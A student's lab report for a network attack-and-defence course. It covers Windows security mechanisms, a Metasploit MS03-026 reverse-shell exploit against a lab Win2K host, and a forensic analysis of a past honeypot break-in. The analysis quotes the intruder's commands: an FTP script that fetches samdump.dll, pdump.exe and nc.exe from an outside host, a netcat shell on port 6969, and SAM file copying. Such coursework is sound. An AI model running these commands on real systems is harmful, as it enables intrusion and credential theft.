20199134 2019-2020-2 《网络攻防实践》第7周作业
20199134 赵兴波 《网络攻防实践》第6周作业
1.实践内容
1.1Windows操作系统基本框架概述
1.1.1Windows基本结构
Windows操作系统的基本结构如下图,分为运行于处理器特权模式的操作系统内核以及运行在处理器非特权模式的用户空间代码。
1.1.2Windows进程和线程管理机制
Windows进程和线程结构示意图如下,包括一个私有虚拟内存空间描述符,系统资源对象句柄列表带有执行用户账户权限的安全访问令牌,记录了进程ID及其父进程ID等信息,并至少包含一个作为进程内部指令执行的进程。
1.2Windows操作系统安全体系结构与机制
1.2.1安全体系结构
- 监控器模型:系统中所有主体到客体的访问都通过监控器作为中介,由引用监控器根据安全访问控制策略来进行授权访问,所有访问记录都由监控器生成审计日志。
- Windows操作系统安全体系结构如下:
1.2.2身份认证机制
- 身份认证:本地身份认证、网络身份认证。
- 身份认证机制实现原理
1.2.3授权与访问控制机制
- 基于引用监控器模型,由SRM模块与和LSASS服务共同来实施。
- 对象类型:文件,目录,注册表键值,内核对象,同步对象,私有对象,管道,内存,通信接口。
1.2.4其他安全机制
- 安全中心
- IPsec加载和验证机制
- EPS加密文件系统
- 文件保护机制
- 捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制
1.3Windows远程安全攻防技术
- 远程攻击:主要分为远程口令猜解攻击、Windows网络服务攻击、Windows客户端和用户攻击。
- Windows系统上的安全漏洞生命周期包括:漏洞发现与披露、渗透测试与利用攻击、漏洞修补等环节的技术过程。
- 针对特定主机系统目标,典型的渗透攻击过程包括漏洞扫描测试、查找针对发现漏洞的渗透代码、实施渗透测试这几个环节。
- 防范措施:软件设计本身、尽快的更新漏洞、安装增强插件、启用入侵检测工具等。
- Metasploit渗透测试:提供了CLI、Console、Web和GUI四种用户交互接口。其主要命令及功能描述如下表:
2.实践过程
2.1实践一:Metasploit Windows Attacker
任务:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
选择kali做为攻击机,Win2KServer做为靶机,二者的IP地址如下:
| 主机 | IP地址 |
|---|---|
| kali | 192.168.200.2 |
| Win2KServer | 192.168.200.124 |
1.kali中输入msfconsole |
2.通过use exploit/windows/dcerpc/ms08_067_netapi使用ms03_067作为我们攻击的目标漏洞,但是失败。
换为use exploit/windows/dcerpc/ms03_026_dcom表示使用MS03-026作为我们攻击的目标漏洞。
然后通过命令set PAYLOAD windows/meterpreter/reverse_tcp设置打开反向连接的载荷。
使用set LHOST 192.168.200.2表示设置攻击机IP地址
使用set RHOST 192.168.200.124表示设置靶机IP地址。
3.使用exploit开始攻击。
4.返回meterpreter表示攻击成功,运行shell指令,并用ipconfig查看shell是否正确执行
5.攻击成功后我们获得了靶机的一个命令行。获得了靶机的命令行后,可以在靶机上创建一个文件夹。
2.2实践二:取证分析实践:解码一次成功的NT系统破解攻击
任务:来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106(主机名为lab.wiretrip.net),回答下列问题。
2.2.1攻击者使用了什么破解工具进行攻击?
1.使用wireshark打开log文件,可以看到好多好多个数据包
2.首先根据题目筛选下ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106,可以发现攻击者一开始进行了HTTP访问。
3.接下来再找可以发现攻击者打开了系统的启动文件boot.ini,同时%C0%AF字符是"/"的Unicode编码
4.然后我们可以看到攻击者试图向服务器获取一个msadcs.dll文件,执行shell脚本数据为shell ( “cmd /c echo werd >> c : \ f u n ” )
5.根据 “ADM!ROX!YOUR!WORLD”特征字符串,以及查询语句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb,我们可以通过 Google 查询到这次攻击应是由rain forest puppy 编写的 msadc(2).pl渗透攻击代码所发起的。
2.2.2攻击者如何使用这个破解工具进入并控制了系统?
1.继续往下看,从会话1778-80开始,我们通过追踪TCP流,发现其指令为cmd /c echo user johna2k > ftpcom,跟随这个数据包继续往下查找,依次可以看到下列的指令
cmd /c echo hacker2000 > ftpcomcmd /c echo get samdump.dll > ftpcomcmd /c echo get pdump.exe > ftpcomcmd /c echo get nc.exe > ftpcomcmd /c ftp -s:ftpcom -n www.nether.net
攻击者首先创建了一个ftpcom脚本,并使用 ftp连接www.nether.net,尝试下载 samdump.dll、pdump.exe和nc.exe。
经过一系列失败后,直到编号1106,才是连接成功的。
攻击者在ftp服务结束之后执行了一条命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限。至此,攻击者完成了进入系统并且获得访问权的过程。
2.2.3攻击者获得系统访问权限后做了什么?
1.筛选 tcp.port == 6969,并追踪 TCP 流
一开始看参考资料案例演示-分析NT系统破解攻击,没怎么看懂,一脸懵逼,结合同学微博,才大概懂了攻击者在干嘛,想要提升自己的用户权限,使用ftp服务下载文件,向yay.txt写入内容,删除和拷贝har.txt文件等等
2.攻击者尝试信息收集,但是没有权限.
3.然后执行net users, 返回该主机的用户列表。
4.然后发了一个 echo 消息到 C 盘根目录文件README.NOW.Hax0r
5.在经历一些失败之后,攻击者删除了许多文件
6.执行rdisk尝试获得SAM口令文件的拷贝,将SAM文件保存为c:\har.txt文件。
7.最后离开
2.2.4我们如何防止这样的攻击?
及时修补漏洞,对漏洞打上相应的补丁。
禁用用不着的 RDS 等服务。
防火墙封禁网络内部服务器发起的连接。
2.2.5你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
攻击者发现了这是一台蜜罐主机,这是攻击者攻击者留下的信息。
2.3团队对抗实践:Windows系统远程渗透攻击和分析
任务:
- 攻击方使用metaploit选择漏洞进行渗透攻击,获得控制权。
- 防守方使用wireshark监听获得网络攻击的数据包,结合分析过程,获得攻击者IP地址、目的IP地址和端口、攻击发起时间、攻击利用漏洞、攻击使用的shellcode,以及本地执行的命令输入信息。
重复实践一的步骤,在运行最后一步exploit时开启wireshark,可以看到靶机与攻击机的ip地址,端口信息等
在攻击机输入ipconfig指令,在Wireshark捕获查看。
3.学习中遇到的问题及解决
- 问题1:面对分析没弄明白
- 问题1解决方案:结合资料及同学博客
4.实践总结
这次总算没碰见运行指令不好使还不好解决的,可是面对分析的内容,我就是如那句歌词“小朋友,你是不是有很多问号❓”,看着参考资料还不知道该怎么办,结合众多资料及博客做完了,感觉还是有些地方理解的不是很明白。
